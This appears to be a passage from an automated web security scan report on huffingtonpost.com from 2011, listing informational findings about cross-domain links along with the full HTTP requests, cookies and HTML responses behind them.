<li><a href="http://www.salon.com/" target="_blank">Salon</a></li>
<li><a href="http://www.sfgate.com/" target="_blank">San Francisco Chronicle</a>
...[SNIP]...
<li><a href="http://www.slate.com/" target="_blank">Slate</a></li>
<li><a href="http://reporting.sunlightfoundation.com/blog/" target="_blank">Sunlight Foundation</a>
...[SNIP]...
<li><a href="http://www.time.com/time/?xid=huffpo-direct" target="_blank">TIME</a></li>
<li><a href="http://www.timesonline.co.uk/section/0,,3,00.html" target="_blank">Times Of London</a>
...[SNIP]...
<li><a href="http://www.tmz.com" target="_blank">TMZ</a></li>
<li><a href="http://www.usatoday.com/" target="_blank">USA Today</a></li>
<li><a href="http://www.vanityfair.com/" target="_blank">Vanity Fair</a>
...[SNIP]...
<li><a href="http://wsj.com/" target="_blank">Wall Street Journal</a>
...[SNIP]...
<li><a href="http://www.washingtonindependent.com/" target="_blank">Washington Independent</a>
...[SNIP]...
<li><a href="http://www.washingtontimes.com/" target="_blank">Washington Times</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/" target="_blank">Washington Post</a>
...[SNIP]...
<li><a href="http://news.yahoo.com/" target="_blank">Yahoo! News</a>
...[SNIP]...
<li><a href=http://www.youthradio.org/>Youth Radio</a>
...[SNIP]...
<li><a href="http://americablog.blogspot.com/" target="_blank">Americablog</a>
...[SNIP]...
<li><a href="http://andrewsullivan.theatlantic.com/" target="_blank">Andrew Sullivan</a>
...[SNIP]...
<li><a href="http://www.bagnewsnotes.com/" target="_blank">BagNewsNotes</a>
...[SNIP]...
<li><a href="http://bloggingheads.tv/" target="_blank">Bloggingheads</a>
...[SNIP]...
<li><a href="http://boingboing.net/" target="_blank">Boing Boing</a>
...[SNIP]...
<li><a href="http://bravenewfilms.org/" target="_blank">Brave New Films</a>
...[SNIP]...
<li><a href="http://www.buzzfeed.com/" target="_blank">BuzzFeed</a></li>
<li><a href="http://www.buzzmachine.com/" target="_blank">BuzzMachine</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/thecorner/corner.asp" target="_blank">The Corner (National Review)</a>
...[SNIP]...
<li><a href="http://mediamatters.org/blog/" target="_blank">County Fair (Media Matters)</a>
...[SNIP]...
<li><a href="http://www.crooksandliars.com/" target="_blank">Crooks and Liars</a>
...[SNIP]...
<li><a href="http://dailycaller.com/" target="_blank">Daily Caller</a>
...[SNIP]...
<li><a href="http://dailykos.com/" target="_blank">Daily Kos</a></li>
<li><a href="http://www.slate.com/blogs/blogs/weigel/" target="_blank">David Weigel</a>
...[SNIP]...
<li><a href="http://democracyarsenal.org/" target="_blank">Democracy Arsenal</a>
...[SNIP]...
<li><a href="http://blogs.reuters.com/felix-salmon/" target="_blank">Felix Salmon</a>
...[SNIP]...
<li><a href="http://firedoglake.com/" target="_blank">Firedoglake</a>
...[SNIP]...
<li><a href="http://fivethirtyeight.blogs.nytimes.com/" target="_blank">FiveThirtyEight</a>
...[SNIP]...
<li><a href="http://www.FrumForum.com" target="_blank">FrumForum</a></li>
<li><a href="http://www.funnyordie.com/" target="_blank">Funny or Die</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/george/" target="_blank">George's Bottom Line (George Stephanopoulos)</a>
...[SNIP]...
<li><a href="http://www.gothamist.com" target="_blank">Gothamist</a></li>
<li><a href="http://hotlineblog.nationaljournal.com/" target="_blank">Hotline On Call (National Journal)</a>
...[SNIP]...
<li><a href="http://digbysblog.blogspot.com/">Hullabaloo</a>
...[SNIP]...
<li><a href="http://www.juancole.com/" target="_blank">Informed Comment</a>
...[SNIP]...
<li><a href="http://www.instapundit.com/" target="_blank">Instapundit</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/james-fallows/" target="_blank">James Fallows</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott" target="_blank">James Wolcott (Vanity Fair)</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/joshua-green/" target="_blank">Joshua Green</a>
...[SNIP]...
<li><a href="http://www.newsweek.com/blogs/kausfiles.html" target="_blank">Kausfiles (Newsweek)</a>
...[SNIP]...
<li><a href="http://www.kottke.org/" target="_blank">kottke.org</a>
...[SNIP]...
<li><a href="http://www.kcrw.com/news/programs/lr" target="_blank">Left, Right and Center</a>
...[SNIP]...
<li><a href="http://themoderatevoice.com/" target="_blank">The Moderate Voice</a>
...[SNIP]...
<li><a href="http://www.ndnblog.com" target="_blank">NDN Blog</a></li>
<li><a href="http://www.thenation.com/blogs/notion" target="_blank">The Notion (Nation)</a>
...[SNIP]...
<li><a href="http://www.pandagon.net/" target="_blank">Pandagon</a></li>
<li><a href="http://krugman.blogs.nytimes.com/" target="_blank">Paul Krugman</a>
...[SNIP]...
<li><a href="http://www.washingtonmonthly.com/" target="_blank">Political Animal (Washington Monthly)</a>
...[SNIP]...
<li><a href="http://politicalwire.com/" target="_blank">Political Wire</a>
...[SNIP]...
<li><a href="http://www.rawstory.com" target="_blank">Raw Story</a></li>
<li><a href="http://redstate.com/" target="_blank">Redstate.com</a>
...[SNIP]...
<li><a href="http://www.seeingtheforest.com/" target="_blank">Seeing The Forest</a>
...[SNIP]...
<li><a href="http://time-blog.com/swampland/" target="_blank">Swampland (Time)</a>
...[SNIP]...
<li><a href="http://talkleft.com/" target="_blank">TalkLeft</a></li>
<li><a href="http://www.talkingpointsmemo.com/" target="_blank">Talking Points Memo</a>
...[SNIP]...
<li><a href="http://www.prospect.org/weblog/" target="_blank">Tapped (American Prospect)</a>
...[SNIP]...
<li><a href="http://www.taylormarsh.com/" target="_blank">Taylor Marsh</a>
...[SNIP]...
<li><a href="http://www.thatminoritything.com/" target="_blank">That Minority Thing</a>
...[SNIP]...
<li><a href="http://www.truthdig.com/" target="_blank">Truthdig</a></li>
<li><a href="http://www.thinkprogress.org/" target="_blank">Think Progress</a>
...[SNIP]...
<li><a href="http://www.thismodernworld.com/" target="_blank">This Modern World</a>
...[SNIP]...
<li><a href="http://www.usnews.com/usnews/politics/whispers/whisphome.htm" target="_blank">Washington Whispers (US News & World Report)</a>
...[SNIP]...
<li><a href="http://www.wonkette.com/" target="_blank">Wonkette</a></li>
<li><a href="http://www.theyoungturks.com/" target="_blank">The Young Turks</a>
...[SNIP]...
<li><a href="http://www.thenation.com/authors/eric-alterman" target="_blank">Eric Alterman</a>
...[SNIP]...
<li><a href="http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html" target="_blank">David Brooks</a>
...[SNIP]...
<li><a href="http://www.nationaljournal.com/columns/political-connections">Ron Brownstein</a>
...[SNIP]...
<li><a href="http://www.observer.com/opinions_conason.asp" target="_blank">Joe Conason</a>
...[SNIP]...
<li><a href="http://www.davidcorn.com" target="_blank">David Corn</a>
...[SNIP]...
<li><a href="http://www.nydailynews.com/topics/Stanley+Crouch" target="_blank">Stanley Crouch</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html" target="_blank">EJ Dionne</a></li>
<li><a href="http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=" target="_blank">Jon Friedman</a>
...[SNIP]...
<li><a href="http://www.opinionjournal.com/diary/" target="_blank">John Fund</a></li>
<li><a href="http://www.thedailybeast.com/author/howard-kurtz/" target="_blank">Howard Kurtz</a>
...[SNIP]...
<li><a href="http://www.hitchensweb.com/" target="_blank">Christopher Hitchens</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/lowry/lowry.asp/" target="_blank">Rich Lowry</a>
...[SNIP]...
<li><a href="http://www.thenation.com/blogs/thebeat " target="_blank">John Nichols</a>
...[SNIP]...
<li><a href="http://online.wsj.com/public/page/peggy-noonan.html" target="_blank">Peggy Noonan</a>
...[SNIP]...
<li><a href="http://slate.msn.com/?id=3944&cp=68090&nav=navom" target="_blank">Jack Shafer</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/sweet/" target="_blank">Lynn Sweet</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html" target="_blank">George Will</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/author/16/michael-wolff.html" target="_blank">Michael Wolff</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://music.aol.com/">AOL MUSIC</a>
...[SNIP]...
<li><a href="http://sixapart.com">Powered by Movable Type</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://vertical-stats.huffpost.com/?-1&&" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="//pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home" style="display:none" height="1" width="1" alt="Quantcast" />
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
<a href="#" class="close_modal" onclick="Modal.hideMask('hp_vertical_common_lightbox');return false;">
           <img width="70" height="22" alt="" src="http://s.huffpost.com/images/modal/close-home.gif" />
        </a>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

16.88. http://www.huffingtonpost.com/blogs_front.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/blogs_front.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/blogs_front.html?1304559867&vertical=homepage&doubleclick=huffpost.premium/front

The response contains the following link to another domain:

http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg

Request

GET /blogs_front.html?1304559867&vertical=homepage&doubleclick=huffpost.premium/front HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304576918960-New%7C1367648918960%3B%20s_nrgvo%3DNew%7C1367648918961%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.17.9.1304575182212

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=116
Date: Thu, 05 May 2011 01:51:56 GMT
Connection: close
Content-Length: 74433

<div id="top_featured_post">


<div id="top_blog">

<div class="entry no_border" id="blog_857784" onmouseover="TrackingData.blog_857784={id:857784,blog_id
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...

16.89. http://www.huffingtonpost.com/news_col_1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/news_col_1.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/news_col_1.html?1304557810&vertical=homepage&doubleclick=huffpost.premium/front

The response contains the following links to other domains:

http://s.huffpost.com/images/hoton_twitter3.png
http://www.nytimes.com/2011/05/04/us/politics/04torture.html
http://www.reuters.com/subjects/bin-laden-compound

Request

GET /news_col_1.html?1304557810&vertical=homepage&doubleclick=huffpost.premium/front HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=60
Date: Thu, 05 May 2011 01:39:50 GMT
Connection: close
Content-Length: 42271

<div id="center_entries_container">


<div id="entry_857738" onmouseover="TrackingData.entry_857738={id:857738,blog_id:2,rank:1,zone:5,vertical:-1
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...

16.90. http://www.huffingtonpost.com/news_col_2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/news_col_2.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/news_col_2.html?1304557811&vertical=homepage&doubleclick=huffpost.premium/front

The response contains the following links to other domains:

http://aol.com/video/930944537001
http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/
http://s.huffpost.com/images/hoton_twitter3.png

Request

GET /news_col_2.html?1304557811&vertical=homepage&doubleclick=huffpost.premium/front HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=300
Date: Thu, 05 May 2011 01:39:44 GMT
Connection: close
Content-Length: 33009

<div id="rc_upper">


<div id="entry_857648" onmouseover="TrackingData.ent
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...

16.91. http://www.huffingtonpost.com/permalink-tracker.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/permalink-tracker.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/permalink-tracker.html?vertical=world

The response contains the following link to another domain:

http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js

Request

GET /permalink-tracker.html?vertical=world HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=25
Date: Thu, 05 May 2011 01:00:35 GMT
Connection: close
Content-Length: 1324

<html>
<head>
<title>Huffit Tracker</title>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=hp_config.js%2Chp_track.js"></script>
</head>
<body>
   
   <
...[SNIP]...

16.92. http://www.huffingtonpost.com/threeup.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/threeup.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=1&h=0

The response contains the following links to other domains:

http://i.huffpost.com/gen/273798/thumbs/r-AFGHANISTAN-PAKISTAN-BIN-LADEN-medium260.jpg
http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg
http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg
http://s.huffpost.com/images/blank.gif

Request

GET /threeup.php?threeup=yes&VerticalName=World&entry_id=857568&v=1&h=0 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; s_pers=%20s_getnr%3D1304575172633-New%7C1367647172633%3B%20s_nrgvo%3DNew%7C1367647172635%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.10.10.1304575105; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 05 May 2011 01:00:37 GMT
Connection: close
Content-Length: 7160

       <div id="857693" class="grid third flush_top threeup_entries">
           <div id="entry_857693" class="entry no_border">
               <div class="image_wrapper"><a href="http://www.huffingtonpost.com/2011/05/04/libya-government-shelling_n_857693.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273918/thumbs/r-LIBYA-INTERNATIONAL-AID-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-photos_n_857719.html" target="_top" onclick="HPTrack.trackPageview('/t/a/threeup.v1/World');">            <img src="http://i.huffpost.com/gen/273951/thumbs/r-OSAMA-BIN-LADEN-PHOTOS-medium260.jpg" border="0" width="260" height="75" alt="" />        </a>
...[SNIP]...
